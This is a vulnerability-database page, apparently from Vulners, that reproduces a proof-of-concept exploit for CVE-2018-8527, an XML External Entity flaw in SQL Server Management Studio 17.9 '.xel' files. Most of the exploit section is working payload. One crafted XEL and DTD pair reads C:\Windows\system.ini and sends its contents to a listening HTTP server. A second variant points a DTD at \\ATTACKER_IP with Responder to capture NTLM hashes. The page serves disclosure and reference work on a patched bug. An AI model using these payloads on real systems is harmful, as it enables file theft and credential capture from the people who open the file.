Vulners
Lucene search
Microsoft SQL Server Management Studio 17.9 - '.xel' XML External Entity Injection
| Reporter | Title | Published | Views | Family All 22 |
|---|---|---|---|---|
 | Microsoft SQL Server Management Studio 17.9 - .xel XML External Entity Injection Vulnerability | 11 Oct 201800:00 | – | zdt |
 | CVE-2018-8532 | 10 Oct 201813:29 | – | attackerkb |
| CVE-2018-8533 | 10 Oct 201813:29 | – | attackerkb |
| CVE-2018-8527 | 10 Oct 201813:29 | – | attackerkb |
 | CVE-2018-8527 | 11 Oct 201800:00 | – | circl |
 | Microsoft SQL Server Management Studio Information Disclosure Vulnerability (CNVD-2018-21210) | 10 Oct 201800:00 | – | cnvd |
 | Microsoft SQL Server Management Studio XXE Injection Information Disclosure (CVE-2018-8527; CVE-2018-8532; CVE-2018-8533) | 18 Nov 201800:00 | – | checkpoint_advisories |
 | CVE-2018-8527 | 10 Oct 201813:00 | – | cve |
 | CVE-2018-8527 | 10 Oct 201813:00 | – | cvelist |
 | Microsoft SQL Server Management Studio 17.9 - .xel XML External Entity Injection | 11 Oct 201800:00 | – | exploitpack |
10
# Exploit Title: Microsoft SQL Server Management Studio 17.9 - '.xel' XML External Entity Injection
# Date: 2018-10-10
# Author: John Page (aka hyp3rlinx)
# Website: hyp3rlinx.altervista.org
# Venodor: www.microsoft.com
# Software: SQL Server Management Studio 17.9 and SQL Server Management Studio 18.0 (Preview 4)
# CVE: CVE-2018-8527
# References:
# http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-XEL-FILETYPE-XML-INJECTION-CVE-2018-8527.txt
# https://www.zerodayinitiative.com/advisories/ZDI-18-1131/
# https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8527
# The author was credited by the vendor (https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8527)
# Description
# This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations
# of Microsoft SQL Server Management Studio. User interaction is required to exploit this vulnerability
# in that the target must visit a malicious page or open a malicious file.
# The specific flaw exists within the handling of XEL files. Due to the improper restriction
# of XML External Entity (XXE) references, a specially crafted document specifying a URI causes the XML parser
# to access the URI and embed the contents back into the XML document for further processing. An attacker
# can leverage this vulnerability to disclose information in the context of the current process.
# [Exploit/POC]
python -m SimpleHTTPServer (listens Port 8000)
"evil.xel" (Extended Event Log File)
<?xml version="1.0"?>
<!DOCTYPE flavios [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
"payload.dtd"
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;
# OR
# Steal NTLM hashes
# Kali linux
/usr/share/responder/tools
responder -I eth0 -rv
"evil.xel"
<?xml version="1.0"?>
<!DOCTYPE dirty0tis [
<!ENTITY % dtd SYSTEM "\\ATTACKER_IP\unknown">
%dtd;]>
Result: Forced authentication and NTLM hash capturedData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Oct 2018 00:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 24.3
CVSS 35.5
EPSS0.4785